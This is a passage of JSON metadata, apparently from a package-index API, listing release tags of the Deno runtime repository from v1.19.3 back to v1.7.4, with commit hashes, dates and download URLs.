d":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/de